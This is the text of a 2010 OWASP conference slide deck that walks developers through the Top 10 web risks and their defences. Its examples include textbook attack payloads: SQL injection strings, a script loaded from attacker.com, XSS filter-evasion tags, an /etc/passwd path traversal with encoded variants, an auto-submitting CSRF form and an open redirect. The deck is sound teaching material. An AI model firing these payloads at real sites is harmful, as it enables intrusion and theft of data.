View
6
Download
0
Category
Preview:
Citation preview
OWASP Top 10from a developer’s perspectiveJohn Wilander, OWASP/Omegapoint, IBWAS’10
John Wilanderconsultant at Omegapointin Sweden
Researcher in application security
Co-leader OWASP Sweden
Certified Java Programmer
OWASP Top 10Top web applicationsecurity risks 2010
OWASP
1. Injection2. Cross-Site Scripting (XSS)3. Broken Authentication and Session
Management4. Insecure Direct Object References5. Cross-Site Request Forgery (CSRF)6. Security Misconfiguration7. Insecure Cryptographic Storage8. Failure to Restrict URL Access9. Insufficient Transport Layer Protection10.Unvalidated Redirects and Forwards
OWASP
1. Injection2. Cross-Site Scripting (XSS)3. Broken Authentication and Session
Management4. Insecure Direct Object References5. Cross-Site Request Forgery (CSRF)6. Security Misconfiguration7. Insecure Cryptographic Storage8. Failure to Restrict URL Access9. Insufficient Transport Layer Protection10.Unvalidated Redirects and Forwards
OWASP
Injection ...the good old, boring stuff
OWASP
sql = "SELECT * FROM users WHERE firstName = '" + fname + "' AND surName = '" + sname + "'";
OWASP
sql = "SELECT * FROM users WHERE firstName = '" + fname + "' AND surName = '" + sname + "'";
OWASP
fname = ’ OR 1=1--sname = blabla
OWASP
sql = "SELECT * FROM users WHERE firstName = '" + ’OR 1=1-- + "' AND surName = '" + blabla + "'";
SELECT *FROM usersWHERE firstName = ''OR 1=1--' AND surName = 'blabla'
OWASP
SELECT *FROM users
OWASP
Input Validation?
OWASP
fname = Johnsname = Wilander
Accept:A-Za-z
OWASP
fname = Luíssname = Grangeia
Accept:A-Za-zí
OWASP
fname = Joãosname = Franco
Accept:A-Za-zíã
OWASP
fname = {some name}sname = {some name}
Accept:A-Za-zíãåäöüû..........
OWASP
fname = {some name}sname = {some name}
Accept:\p{L}
OWASP
fname = Oliversname = O’Heir
Accept:\p{L}
OWASP
fname = Oliversname = O’Heir
Accept:\p{L}’
OWASP
fname = Fredriksname = Jägare-Lilja
Accept:\p{L}’
OWASP
fname = Fredriksname = Jägare-Lilja
Accept:\p{L}’-
OWASP
fname = John Ericsname = Wilander
Accept:\p{L}’-
OWASP
fname = ’OR ‘a’ IS NOT NULL--sname = blabla
Accept:\p{L}’-
OWASP
But ...
’OR ‘a’ IS NOT NULL--
is not a name!
OWASP
PreparedStatement preparedStmt = connection.prepareStatement( ”SELECT a, b FROM table WHERE c = ?”);preparedStmt.setInt(1, column);ResultSet resultset = preparedStmt.executeQuery();
OWASP
PreparedStatement preparedStmt = connection.prepareStatement( ”SELECT a, b FROM table WHERE c = ?”);preparedStmt.setInt(1, column);ResultSet resultset = preparedStmt.executeQuery();
OWASP
PreparedStatement preparedStmt = connection.prepareStatement( ”SELECT a, b FROM table WHERE c = ?”);preparedStmt.setInt(1, column);ResultSet resultset = preparedStmt.executeQuery();
OWASP
XSS ...much more exciting!
OWASP
Run
script
Cross-site
Scripting
OWASP
Is ...
<script src=”http://attacker.com/c.js”></script>
a name?
OWASP
Just filter <script>, huh?
<img src=javascript:alert('XSS')>
<body onload=alert('XSS')>
<table background="javascript:alert('XSS')">
¼script¾alert(¢XSS¢)¼/script¾
OWASP
<dependency> <groupId>org.owasp</groupId> <artifactId>antisamy</artifactId> <version>1.4</version></dependency>
OWASP AntiSamy
OWASP
Content Security Policy
X-Content-Security-Policy: allow 'self';
OWASP
Session Management ...just a quick one
OWASP
HTTP StatelessGET http://www.site.com/ HTTP/1.1
HTTP/1.1 200 OK
OWASP
HTTP StatelessGET http://www.site.com/ HTTP/1.1
HTTP/1.1 200 OK
OWASP
Hold Your Sessions
• Session ID in URLwww.site.com/ … ;sessionid=1234
• Session ID in hidden form fields<INPUT TYPE=”hidden” NAME=”sessionid” VALUE=”1234”>
• Session ID in cookieSet-Cookie: sessionID=”1234” …
OWASP
HTTP + SessionGET http://www.site.com/ HTTP/1.1
HTTP/1.1 200 OK
OWASP
HTTP + SessionGET http://www.site.com/ HTTP/1.1
HTTP/1.1 200 OK
Cookie Monster©2009 Sesame Workshop
OWASP
About Cookies
• Enduser owns the cookies
• don’t trust cookies backend
• don’t hide anything in them
• JavaScript (thus XSS) can read cookies
• use httpOnly attribute
• Cookies are sent for all requests
• use secure attributeOWASP
Insecure Direct Object Reference
just a quick one
OWASP
http://site.com/cms?file=report524.pdf
http://site.com/cms?file=../../../../../../../../../etc/passwd
OWASP
Filter ”../” huh?..%2F (URL encoding)%2E%2E%2F (URL encoding)Li4v (Base64 encoding)%002E%002E%002F (Unicode)
”..\” often the same meaning as ”../”..%5C (URL encoding)%2E%2E%5C (URL encoding)Li5c (Base64 encoding)%002E%002E%005C (Unicode)
OWASP
OWASP ESAPIAccess Reference Map
Browser URL
Access Ref Map
WS
DB
FSfile=456772 456772 report524.pdf
OWASP
CSRF ...my current favorite!
OWASP
What’s on your mind? What’s on your mind?POST POST
OWASP
I love OWASP!
What’s on your mind? What’s on your mind?POST POST
OWASP
I love OWASP!
What’s on your mind? What’s on your mind?POST POST
John: I love OWASP!
OWASP
What’s on your mind? What’s on your mind?POST POST
OWASP
What’s on your mind?I hate OWASP!
What’s on your mind?POST POST
OWASP
What’s on your mind?I hate OWASP!
What’s on your mind?POST POST
OWASP
What’s on your mind?I hate OWASP!
What’s on your mind?POST POST
John: I hate OWASP!
OWASP
What’s on your mind? What’s on your mind?POST
John: I hate OWASP!
<form id="target" method="POST" action="https://john.com/mind" style="visibility:hidden"><input type="text" value="I hate OWASP!" name="oneLiner"/><input type="submit" value="Go"/></form>
<script type="text/javascript"> $(document).ready(function() { $('#form').submit(); });</script>
OWASP
Insufficient Transport Layer Protection
OWASP
OWASP
OWASP
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form">
OWASP
Moxie’s SSL Strip
Terminates SSL
Changes https to http
Normal https to the server
Acts as client
OWASP
Moxie’s SSL Strip
Secure cookie?
Encoding, gzip?
Cached content?
Sessions?
Strip the secure attribute off all cookies.
Strip all encodings in the request.
Strip all if-modified-since in the request.
Redriect to same page, set-cookie expired
OWASP
OWASP Transport Layer Protection Cheat Sheet
http://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
OWASP
Unvalidated Redirects and Forwards ...
phising all the way home!
OWASP
Return Path et al
www.site.com/login?returnPath=www.site.com/secure?page=3
OWASP
Return Path et al
www.site.com/login?returnPath=www.attacker.com
OWASP
Return Path et al
www.site.com/login?returnPath=bit.ly/Kl89GT
OWASP
ESAPI sendRedirect()
http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html
sendRedirect(HttpServletResponse, String)
OWASP
1. Injection2. Cross-Site Scripting (XSS)3. Broken Authentication and Session
Management4. Insecure Direct Object References5. Cross-Site Request Forgery (CSRF)6. Security Misconfiguration7. Insecure Cryptographic Storage8. Failure to Restrict URL Access9. Insufficient Transport Layer Protection10.Unvalidated Redirects and Forwards
OWASP
john.wilander@owasp.orgTwitter: @johnwilander
Blog: appsandsecurity.blogspot.com
OWASP
Recommended